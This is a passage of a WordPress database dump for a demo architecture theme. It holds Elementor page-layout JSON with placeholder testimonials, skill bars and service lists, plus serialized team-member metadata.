t\":\"px\",\"size\":10,\"sizes\":[]},\"bar_border_radius\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cec45ef\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-3.jpg\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center center\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b02bbc3\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"2a1696a\",\"elType\":\"widget\",\"settings\":{\"version\":\"version_3\",\"tab_item\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"6030bc4\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"}},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"c9dec93\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/jessica.jpg\",\"id\":1416,\"alt\":\"\",\"source\":\"library\"}},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"7512efb\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/avatar.jpg\",\"id\":718,\"alt\":\"\",\"source\":\"library\"}}],\"dot_control\":\"\",\"content_color\":\"#FFFFFF\",\"author_name_color\":\"#FFFFFF\",\"content_testimonial_typography_typography\":\"custom\",\"content_testimonial_typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"content_testimonial_typography_font_weight\":\"500\",\"content_testimonial_typography_line_height\":{\"unit\":\"em\",\"size\":1.6,\"sizes\":[]},\"author_name_typography_typography\":\"custom\",\"author_name_typography_font_weight\":\"800\",\"job_typography_typography\":\"custom\",\"job_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"job_typography_font_weight\":\"700\",\"job_typography_text_transform\":\"uppercase\",\"job_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1,\"sizes\":[]},\"job_color\":\"#E3B25A\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"background_item_padding_mobile\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"tab_item_v2\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"5c64a4f\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"8a92eb0\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"78a7995\"}],\"tab_item_v3\":[{\"name_author\":\"Kevin martin\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"253227a\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"}},{\"name_author\":\"Jessica brown \",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"9838c98\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/jessica.jpg\",\"id\":1416,\"alt\":\"\",\"source\":\"library\"}},{\"name_author\":\"Mike hardson\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"02e7bd7\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"}}],\"author_name_typography_font_size\":{\"unit\":\"px\",\"size\":22,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_testimonial\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5978ece\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"49a8f99\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"94307b0\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/about-me-planning-stage.jpg\",\"id\":2348,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"dfa29c0\",\"elType\":\"widget\",\"settings\":{\"title\":\"Planning stage\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":24,\"sizes\":[]},\"typography_font_weight\":\"800\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a9753bc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>There are many variations of passages of psum available but the majority have suffered.<\\/p>\",\"text_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"8\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2bb252b\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Residential interior work\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"7113fdf\"},{\"text\":\" Creative solutions for home\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"e6ab069\"},{\"text\":\"Modern design ideas\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#242424\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":false},{\"id\":\"ebc310d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"d308ac2\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/about-me-flexible-output.jpg\",\"id\":2346,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"51606ad\",\"elType\":\"widget\",\"settings\":{\"title\":\"Flexible output\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":24,\"sizes\":[]},\"typography_font_weight\":\"800\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6f1abbd\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>There are many variations of passages of psum available but the majority have suffered.<\\/p>\",\"text_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"8\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"4ae5e4e\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Complete italian wooden works\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"7113fdf\"},{\"text\":\" Creative solutions for home\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"e6ab069\"},{\"text\":\"Modern design ideas\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#242424\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":false},{\"id\":\"3802903\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"db13835\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/about-me-new-material.jpg\",\"id\":2347,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"fd33b43\",\"elType\":\"widget\",\"settings\":{\"title\":\"New material\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":24,\"sizes\":[]},\"typography_font_weight\":\"800\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"50969ae\",\"elType\":\"widget\",\"settings\":{\"editor\":\"There are many variations of passages of psum available but the majority have suffered.\",\"text_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"8\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"dd5a46e\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Residential interior work\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"7113fdf\"},{\"text\":\" Creative solutions for home\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"e6ab069\"},{\"text\":\"  Premium quality of full apartment\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#242424\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":false}],\"isInner\":false}]'),(1371,2467,'_elementor_page_assets','a:0:{}'),(1373,2469,'ova_team_met_avatar_id','921'),(1374,2469,'ova_team_met_avatar','https://demo.ovatheme.com/retirio/wp-content/uploads/2022/06/team-01.jpg'),(1375,2469,'ova_team_met_job','Architecture'),(1376,2469,'ova_team_met_group_icon','a:4:{i:0;a:2:{s:30:\"ova_team_met_class_icon_social\";s:14:\"fab fa-twitter\";s:24:\"ova_team_met_link_social\";s:19:\"https://twitter.com\";}i:1;a:2:{s:30:\"ova_team_met_class_icon_social\";s:15:\"fab fa-facebook\";s:24:\"ova_team_met_link_social\";s:40:\"https://www.facebook.com/ovatheme.envato\";}i:2;a:2:{s:30:\"ova_team_met_class_icon_social\";s:18:\"fab fa-pinterest-p\";s:24:\"ova_team_met_link_social\";s:25:\"https://www.pinterest.com\";}i:3;a:2:{s:30:\"ova_team_met_class_icon_social\";s:16:\"fab fa-instagram\";s:24:\"ova_team_met_link_social\";s:25:\"https://www.instagram.com\";}}'),(1377,2469,'ova_team_met_slogans','<h3>I help my clients stand out and they help me grow.</h3>\r\nLorem ipsum dolor sit amet, con adipiscing elit tiam convallis elit id impedie. Quisq commodo simply free ornare tortor.\r\n\r\nIf you are going to use a passage of Lorem Ipsum, you need to be sure there isn\'t anything embarrassing hidden in the middle of text.'),(1378,2469,'ova_team_met_order_team','1'),(1379,2469,'_elementor_edit_mode','builder'),(1380,2469,'_elementor_template_type','wp-post'),(1381,2469,'_elementor_version','3.6.6'),(1382,2469,'_wp_page_template','default'),(1383,2469,'_elementor_data','[{\"id\":\"fdf95b0\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"110\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"c1adc30\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"space_between_widgets\":40,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"88add9e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Personal experience\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":36,\"sizes\":[]},\"typography_font_weight\":\"800\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"ffc3307\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>If you are going to use a passage of Lorem Ipsum, you need to be sure there isn\'t anything embarrassing hidden.<\\/p>\",\"text_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"90f1ef9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"space_between_widgets\":15},\"elements\":[{\"id\":\"349a0b2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Archirecture\",\"percent\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#F5F5F5\",\"bar_height\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"bar_border_radius\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"},{\"id\":\"f0b4c3f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Designing\",\"percent\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#F5F5F5\",\"bar_height\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"bar_border_radius\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"},{\"id\":\"7ef98be\",\"elType\":\"widget\",\"settings\":{\"title\":\"Interior\",\"percent\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#F5F5F5\",\"bar_height\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"bar_border_radius\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8dffc21\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-3.jpg\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center center\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"64db9d4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"a272d89\",\"elType\":\"widget\",\"settings\":{\"version\":\"version_3\",\"tab_item\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"6030bc4\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"}},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"c9dec93\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/jessica.jpg\",\"id\":1416,\"alt\":\"\",\"source\":\"library\"}},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"7512efb\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/avatar.jpg\",\"id\":718,\"alt\":\"\",\"source\":\"library\"}}],\"dot_control\":\"\",\"content_color\":\"#FFFFFF\",\"author_name_color\":\"#FFFFFF\",\"content_testimonial_typography_typography\":\"custom\",\"content_testimonial_typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"content_testimonial_typography_font_weight\":\"500\",\"content_testimonial_typography_line_height\":{\"unit\":\"em\",\"size\":1.6,\"sizes\":[]},\"author_name_typography_typography\":\"custom\",\"author_name_typography_font_weight\":\"800\",\"job_typography_typography\":\"custom\",\"job_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"job_typography_font_weight\":\"700\",\"job_typography_text_transform\":\"uppercase\",\"job_typography_letter_spacing\":{\"unit\":\"px\",\"size\":1,\"sizes\":[]},\"job_color\":\"#E3B25A\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"background_item_padding_mobile\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"tab_item_v2\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"5c64a4f\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"8a92eb0\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"78a7995\"}],\"tab_item_v3\":[{\"name_author\":\"Kevin martin\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"253227a\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"}},{\"name_author\":\"Jessica brown \",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"9838c98\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/jessica.jpg\",\"id\":1416,\"alt\":\"\",\"source\":\"library\"}},{\"name_author\":\"Mike hardson\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"02e7bd7\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"}}],\"author_name_typography_font_size\":{\"unit\":\"px\",\"size\":22,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_testimonial\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"72b0264\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"097c6c0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"bcfb858\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/about-me-planning-stage.jpg\",\"id\":2348,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8c89147\",\"elType\":\"widget\",\"settings\":{\"title\":\"Planning stage\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":24,\"sizes\":[]},\"typography_font_weight\":\"800\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d8cf87d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>There are many variations of passages of psum available but the majority have suffered.<\\/p>\",\"text_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"8\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"a3ca0de\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Residential interior work\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"7113fdf\"},{\"text\":\" Creative solutions for home\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"e6ab069\"},{\"text\":\"Modern design ideas\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#242424\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":false},{\"id\":\"d1a9295\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"807dfde\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/about-me-flexible-output.jpg\",\"id\":2346,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9fe7239\",\"elType\":\"widget\",\"settings\":{\"title\":\"Flexible output\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":24,\"sizes\":[]},\"typography_font_weight\":\"800\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"682b6ee\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>There are many variations of passages of psum available but the majority have suffered.<\\/p>\",\"text_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"8\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f17e180\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Complete italian wooden works\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"7113fdf\"},{\"text\":\" Creative solutions for home\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"e6ab069\"},{\"text\":\"Modern design ideas\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#242424\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"bold\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":false},{\"id\":\"44bef5b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"13d4194\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/about-me-new-material.jpg\",\"id\":2347,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4feef43\",\"elType\":\"widget\",\"settings\":{\"title\":\"New material\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":24,\"sizes\":[]},\"typography_font_weight\":\"800\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6fd75c6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"There are many variations of passages of psum available but the majority have suffered.\",\"text_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"8\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c06dabc\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Residential interior work\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"7113fdf\"},{\"text\":\" Creative solutions for home\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"e6ab069\"},{\"text\":\"  Premium quality of full apartment\",\"selected_icon\":{\"value\":\"fas 